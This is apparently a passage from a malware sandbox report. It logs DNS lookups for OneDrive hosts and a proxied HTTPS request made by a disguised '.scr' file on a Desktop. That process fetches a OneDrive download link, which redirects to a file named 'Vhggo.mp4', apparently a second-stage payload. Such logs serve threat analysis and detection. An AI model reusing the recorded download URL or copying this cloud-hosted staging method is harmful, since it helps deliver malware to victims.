Apr 19, 2024 16:16:46.186805010 CEST	8.8.8.8	192.168.2.22	0xbea2	No error (0)	dual-spov-0006.spov-msedge.net		13.107.139.11	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:46.291877985 CEST	8.8.8.8	192.168.2.22	0xbea2	No error (0)	onedrive.live.com	web.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:46.291877985 CEST	8.8.8.8	192.168.2.22	0xbea2	No error (0)	web.fe.1drv.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:46.291877985 CEST	8.8.8.8	192.168.2.22	0xbea2	No error (0)	odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net	dual-spov-0006.spov-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:46.291877985 CEST	8.8.8.8	192.168.2.22	0xbea2	No error (0)	dual-spov-0006.spov-msedge.net		13.107.137.11	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:46.291877985 CEST	8.8.8.8	192.168.2.22	0xbea2	No error (0)	dual-spov-0006.spov-msedge.net		13.107.139.11	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:46.523964882 CEST	8.8.8.8	192.168.2.22	0xbea2	No error (0)	onedrive.live.com	web.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:46.523964882 CEST	8.8.8.8	192.168.2.22	0xbea2	No error (0)	web.fe.1drv.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:46.523964882 CEST	8.8.8.8	192.168.2.22	0xbea2	No error (0)	odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net	dual-spov-0006.spov-dc-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:46.523964882 CEST	8.8.8.8	192.168.2.22	0xbea2	No error (0)	dual-spov-0006.spov-dc-msedge.net		150.171.41.11	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:46.523964882 CEST	8.8.8.8	192.168.2.22	0xbea2	No error (0)	dual-spov-0006.spov-dc-msedge.net		150.171.43.11	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:46.629395962 CEST	8.8.8.8	192.168.2.22	0xbea2	No error (0)	onedrive.live.com	web.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:46.629395962 CEST	8.8.8.8	192.168.2.22	0xbea2	No error (0)	web.fe.1drv.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:46.629395962 CEST	8.8.8.8	192.168.2.22	0xbea2	No error (0)	odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net	dual-spov-0006.spov-dc-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:46.629395962 CEST	8.8.8.8	192.168.2.22	0xbea2	No error (0)	dual-spov-0006.spov-dc-msedge.net		150.171.41.11	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:46.629395962 CEST	8.8.8.8	192.168.2.22	0xbea2	No error (0)	dual-spov-0006.spov-dc-msedge.net		150.171.43.11	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:46.734975100 CEST	8.8.8.8	192.168.2.22	0xbea2	No error (0)	onedrive.live.com	web.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:46.734975100 CEST	8.8.8.8	192.168.2.22	0xbea2	No error (0)	web.fe.1drv.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:46.734975100 CEST	8.8.8.8	192.168.2.22	0xbea2	No error (0)	odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net	dual-spov-0006.spov-dc-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:46.734975100 CEST	8.8.8.8	192.168.2.22	0xbea2	No error (0)	dual-spov-0006.spov-dc-msedge.net		150.171.41.11	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:46.734975100 CEST	8.8.8.8	192.168.2.22	0xbea2	No error (0)	dual-spov-0006.spov-dc-msedge.net		150.171.43.11	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:48.046415091 CEST	8.8.8.8	192.168.2.22	0x9ede	No error (0)	public.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:48.046415091 CEST	8.8.8.8	192.168.2.22	0x9ede	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:48.151813030 CEST	8.8.8.8	192.168.2.22	0x9ede	No error (0)	public.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:48.151813030 CEST	8.8.8.8	192.168.2.22	0x9ede	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:48.309794903 CEST	8.8.8.8	192.168.2.22	0x9ede	No error (0)	public.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:48.309794903 CEST	8.8.8.8	192.168.2.22	0x9ede	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:48.415648937 CEST	8.8.8.8	192.168.2.22	0x9ede	No error (0)	public.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:48.415648937 CEST	8.8.8.8	192.168.2.22	0x9ede	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:48.716620922 CEST	8.8.8.8	192.168.2.22	0xf7c2	No error (0)	public.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:48.716620922 CEST	8.8.8.8	192.168.2.22	0xf7c2	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:48.834243059 CEST	8.8.8.8	192.168.2.22	0xf7c2	No error (0)	public.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:48.834243059 CEST	8.8.8.8	192.168.2.22	0xf7c2	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:48.939842939 CEST	8.8.8.8	192.168.2.22	0xf7c2	No error (0)	public.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:48.939842939 CEST	8.8.8.8	192.168.2.22	0xf7c2	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:00.492229939 CEST	8.8.8.8	192.168.2.22	0xa0c2	Name error (3)	63.155.11.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Apr 19, 2024 16:17:00.597832918 CEST	8.8.8.8	192.168.2.22	0xa0c2	Name error (3)	63.155.11.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Apr 19, 2024 16:17:06.218147993 CEST	8.8.8.8	192.168.2.22	0x67c2	No error (0)	onedrive.live.com	web.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:06.218147993 CEST	8.8.8.8	192.168.2.22	0x67c2	No error (0)	web.fe.1drv.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:06.218147993 CEST	8.8.8.8	192.168.2.22	0x67c2	No error (0)	odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net	dual-spov-0006.spov-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:06.218147993 CEST	8.8.8.8	192.168.2.22	0x67c2	No error (0)	dual-spov-0006.spov-msedge.net		13.107.137.11	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:06.218147993 CEST	8.8.8.8	192.168.2.22	0x67c2	No error (0)	dual-spov-0006.spov-msedge.net		13.107.139.11	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:06.774657965 CEST	8.8.8.8	192.168.2.22	0x959b	No error (0)	onedrive.live.com	web.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:06.774657965 CEST	8.8.8.8	192.168.2.22	0x959b	No error (0)	web.fe.1drv.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:06.774657965 CEST	8.8.8.8	192.168.2.22	0x959b	No error (0)	odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net	dual-spov-0006.spov-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:06.774657965 CEST	8.8.8.8	192.168.2.22	0x959b	No error (0)	dual-spov-0006.spov-msedge.net		13.107.137.11	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:06.774657965 CEST	8.8.8.8	192.168.2.22	0x959b	No error (0)	dual-spov-0006.spov-msedge.net		13.107.139.11	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:08.923115015 CEST	8.8.8.8	192.168.2.22	0xc94c	No error (0)	public.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:08.923115015 CEST	8.8.8.8	192.168.2.22	0xc94c	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:09.028888941 CEST	8.8.8.8	192.168.2.22	0xc94c	No error (0)	public.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:09.028888941 CEST	8.8.8.8	192.168.2.22	0xc94c	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:09.616692066 CEST	8.8.8.8	192.168.2.22	0xd292	No error (0)	public.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:09.616692066 CEST	8.8.8.8	192.168.2.22	0xd292	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:09.722064972 CEST	8.8.8.8	192.168.2.22	0xd292	No error (0)	public.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:09.722064972 CEST	8.8.8.8	192.168.2.22	0xd292	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:10.227175951 CEST	8.8.8.8	192.168.2.22	0xd292	No error (0)	public.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:10.227175951 CEST	8.8.8.8	192.168.2.22	0xd292	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:10.383984089 CEST	8.8.8.8	192.168.2.22	0xd292	No error (0)	public.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:10.383984089 CEST	8.8.8.8	192.168.2.22	0xd292	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:10.489423990 CEST	8.8.8.8	192.168.2.22	0xd292	No error (0)	public.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:10.489423990 CEST	8.8.8.8	192.168.2.22	0xd292	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:15.221918106 CEST	8.8.8.8	192.168.2.22	0x21d2	No error (0)	onedrive.live.com	web.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:15.221918106 CEST	8.8.8.8	192.168.2.22	0x21d2	No error (0)	web.fe.1drv.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:15.221918106 CEST	8.8.8.8	192.168.2.22	0x21d2	No error (0)	odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net	dual-spov-0006.spov-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:15.221918106 CEST	8.8.8.8	192.168.2.22	0x21d2	No error (0)	dual-spov-0006.spov-msedge.net		13.107.137.11	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:15.221918106 CEST	8.8.8.8	192.168.2.22	0x21d2	No error (0)	dual-spov-0006.spov-msedge.net		13.107.139.11	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:15.673007965 CEST	8.8.8.8	192.168.2.22	0xf7f6	No error (0)	onedrive.live.com	web.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:15.673007965 CEST	8.8.8.8	192.168.2.22	0xf7f6	No error (0)	web.fe.1drv.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:15.673007965 CEST	8.8.8.8	192.168.2.22	0xf7f6	No error (0)	odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net	dual-spov-0006.spov-dc-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:15.673007965 CEST	8.8.8.8	192.168.2.22	0xf7f6	No error (0)	dual-spov-0006.spov-dc-msedge.net		150.171.41.11	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:15.673007965 CEST	8.8.8.8	192.168.2.22	0xf7f6	No error (0)	dual-spov-0006.spov-dc-msedge.net		150.171.43.11	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:16.805298090 CEST	8.8.8.8	192.168.2.22	0x4f6c	No error (0)	onedrive.live.com	web.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:16.805298090 CEST	8.8.8.8	192.168.2.22	0x4f6c	No error (0)	web.fe.1drv.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:16.805298090 CEST	8.8.8.8	192.168.2.22	0x4f6c	No error (0)	odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net	dual-spov-0006.spov-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:16.805298090 CEST	8.8.8.8	192.168.2.22	0x4f6c	No error (0)	dual-spov-0006.spov-msedge.net		13.107.137.11	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:16.805298090 CEST	8.8.8.8	192.168.2.22	0x4f6c	No error (0)	dual-spov-0006.spov-msedge.net		13.107.139.11	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:16.890840054 CEST	8.8.8.8	192.168.2.22	0x962a	No error (0)	public.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:16.890840054 CEST	8.8.8.8	192.168.2.22	0x962a	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:16.916865110 CEST	8.8.8.8	192.168.2.22	0x9bec	No error (0)	onedrive.live.com	web.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:16.916865110 CEST	8.8.8.8	192.168.2.22	0x9bec	No error (0)	web.fe.1drv.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:16.916865110 CEST	8.8.8.8	192.168.2.22	0x9bec	No error (0)	odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net	dual-spov-0006.spov-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:16.916865110 CEST	8.8.8.8	192.168.2.22	0x9bec	No error (0)	dual-spov-0006.spov-msedge.net		13.107.137.11	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:16.916865110 CEST	8.8.8.8	192.168.2.22	0x9bec	No error (0)	dual-spov-0006.spov-msedge.net		13.107.139.11	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:17.062417030 CEST	8.8.8.8	192.168.2.22	0xfafa	No error (0)	public.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:17.062417030 CEST	8.8.8.8	192.168.2.22	0xfafa	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:18.435774088 CEST	8.8.8.8	192.168.2.22	0x87ed	No error (0)	utqurw.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:18.435774088 CEST	8.8.8.8	192.168.2.22	0x87ed	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:18.559691906 CEST	8.8.8.8	192.168.2.22	0x87ed	No error (0)	utqurw.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:18.559691906 CEST	8.8.8.8	192.168.2.22	0x87ed	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:18.670228958 CEST	8.8.8.8	192.168.2.22	0x87ed	No error (0)	utqurw.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:18.670228958 CEST	8.8.8.8	192.168.2.22	0x87ed	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:18.777476072 CEST	8.8.8.8	192.168.2.22	0x87ed	No error (0)	utqurw.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:18.777476072 CEST	8.8.8.8	192.168.2.22	0x87ed	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:18.906522989 CEST	8.8.8.8	192.168.2.22	0xd3e4	No error (0)	utqurw.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:18.906522989 CEST	8.8.8.8	192.168.2.22	0xd3e4	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:19.028656960 CEST	8.8.8.8	192.168.2.22	0xd3e4	No error (0)	utqurw.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:19.028656960 CEST	8.8.8.8	192.168.2.22	0xd3e4	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:19.135179043 CEST	8.8.8.8	192.168.2.22	0xd3e4	No error (0)	utqurw.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:19.135179043 CEST	8.8.8.8	192.168.2.22	0xd3e4	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:20.561292887 CEST	8.8.8.8	192.168.2.22	0xa82d	No error (0)	skydrive.live.com	odwebpl.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:20.561292887 CEST	8.8.8.8	192.168.2.22	0xa82d	No error (0)	odsp-odweb-odcfe-lb.nameastus2946819.odsp-odweb-odcfe.eastus2-prod.cosmic.office.net	cosmic-eastus2-ns-8a58b1860b73.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:20.713864088 CEST	8.8.8.8	192.168.2.22	0xa82d	No error (0)	skydrive.live.com	odwebpl.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:20.713864088 CEST	8.8.8.8	192.168.2.22	0xa82d	No error (0)	odsp-odweb-odcfe-lb.nameastus9685829.odsp-odweb-odcfe.eastus-prod.cosmic.office.net	cosmic-eastus-ns-75bf60968b55.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:20.923724890 CEST	8.8.8.8	192.168.2.22	0xa82d	No error (0)	skydrive.live.com	odwebpl.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:20.923724890 CEST	8.8.8.8	192.168.2.22	0xa82d	No error (0)	odsp-odweb-odcfe-lb.nameastus2300077.odsp-odweb-odcfe.eastus-prod.cosmic.office.net	cosmic-eastus-ns-9067974ac67b.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:21.098366022 CEST	8.8.8.8	192.168.2.22	0xa82d	No error (0)	skydrive.live.com	odwebpl.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:21.098366022 CEST	8.8.8.8	192.168.2.22	0xa82d	No error (0)	odsp-odweb-odcfe-lb.nameastus2708987.odsp-odweb-odcfe.eastus2-prod.cosmic.office.net	cosmic-eastus2-ns-d2d9c8d5cfc0.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:21.269529104 CEST	8.8.8.8	192.168.2.22	0xa82d	No error (0)	skydrive.live.com	odwebpl.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:21.269529104 CEST	8.8.8.8	192.168.2.22	0xa82d	No error (0)	odsp-odweb-odcfe-lb.nameastus2946819.odsp-odweb-odcfe.eastus2-prod.cosmic.office.net	cosmic-eastus2-ns-8a58b1860b73.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:29.212724924 CEST	8.8.8.8	192.168.2.22	0x1848	Name error (3)	63.155.11.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Apr 19, 2024 16:17:29.317672014 CEST	8.8.8.8	192.168.2.22	0x1848	Name error (3)	63.155.11.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Apr 19, 2024 16:17:29.423091888 CEST	8.8.8.8	192.168.2.22	0x1848	Name error (3)	63.155.11.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Apr 19, 2024 16:17:29.528367996 CEST	8.8.8.8	192.168.2.22	0x1848	Name error (3)	63.155.11.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Apr 19, 2024 16:17:46.779114008 CEST	8.8.8.8	192.168.2.22	0xb268	No error (0)	onedrive.live.com	web.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:46.779114008 CEST	8.8.8.8	192.168.2.22	0xb268	No error (0)	web.fe.1drv.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:46.779114008 CEST	8.8.8.8	192.168.2.22	0xb268	No error (0)	odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net	dual-spov-0006.spov-dc-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:46.779114008 CEST	8.8.8.8	192.168.2.22	0xb268	No error (0)	dual-spov-0006.spov-dc-msedge.net		150.171.41.11	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:46.779114008 CEST	8.8.8.8	192.168.2.22	0xb268	No error (0)	dual-spov-0006.spov-dc-msedge.net		150.171.43.11	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:46.900000095 CEST	8.8.8.8	192.168.2.22	0xb708	No error (0)	onedrive.live.com	web.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:46.900000095 CEST	8.8.8.8	192.168.2.22	0xb708	No error (0)	web.fe.1drv.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:46.900000095 CEST	8.8.8.8	192.168.2.22	0xb708	No error (0)	odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net	dual-spov-0006.spov-dc-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:46.900000095 CEST	8.8.8.8	192.168.2.22	0xb708	No error (0)	dual-spov-0006.spov-dc-msedge.net		150.171.41.11	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:46.900000095 CEST	8.8.8.8	192.168.2.22	0xb708	No error (0)	dual-spov-0006.spov-dc-msedge.net		150.171.43.11	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:48.500559092 CEST	8.8.8.8	192.168.2.22	0x1981	No error (0)	utqurw.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:48.500559092 CEST	8.8.8.8	192.168.2.22	0x1981	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:48.621754885 CEST	8.8.8.8	192.168.2.22	0x1981	No error (0)	utqurw.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:48.621754885 CEST	8.8.8.8	192.168.2.22	0x1981	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:48.728013992 CEST	8.8.8.8	192.168.2.22	0x1981	No error (0)	utqurw.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:48.728013992 CEST	8.8.8.8	192.168.2.22	0x1981	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:48.833484888 CEST	8.8.8.8	192.168.2.22	0x1981	No error (0)	utqurw.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:48.833484888 CEST	8.8.8.8	192.168.2.22	0x1981	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:48.939300060 CEST	8.8.8.8	192.168.2.22	0x1981	No error (0)	utqurw.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:17:48.939300060 CEST	8.8.8.8	192.168.2.22	0x1981	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

onedrive.live.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49171	13.107.137.11	443	3224	C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

Timestamp	Bytes transferred	Direction	Data
2024-04-19 14:16:44 UTC	129	OUT	GET /download?resid=26943FEBC022618F%21479&authkey=!APRD0RAPKJuy4WE HTTP/1.1 Host: onedrive.live.com Connection: Keep-Alive
2024-04-19 14:16:44 UTC	1171	IN	HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: -1 Location: https://public.am.files.1drv.com/y4m330KkpvSU2_5eIEzg9ufJvqrZWwMg94qIz09bT9nMltWjECZH4Cu2Zuuu5jzPmspcbCYit5eYAE1ybtlaiEyt7dBUuipCc2XQxTHbojjXjIwqFrJSMA5RqjSSE4u_6CCR-dAUJunuQWUSYQ35h9AjmqTYarp0U6GBqEQR8bc50QqPJWVe9p6p2SMEru_1MhF9uuMQrCiD32h0_j7vP6NYw/Vhggo.mp4?download&psid=1 Set-Cookie: E=P:k+s9V3tg3Ig=:BX4zcCgEOlbJB6p+/m76QQMg0uLnZ/G21vAaiM0RsPg=:F; domain=.live.com; path=/ Set-Cookie: xid=aa1087f4-341f-43c1-9175-32b04566aa45&&ODSP-ODWEB-ODCF&147; domain=.live.com; path=/ Set-Cookie: xidseq=1; domain=.live.com; path=/ Set-Cookie: LD=; domain=.live.com; expires=Fri, 19-Apr-2024 12:36:44 GMT; path=/ Set-Cookie: wla42=; domain=live.com; expires=Fri, 26-Apr-2024 14:16:44 GMT; path=/ X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-MSNServer: 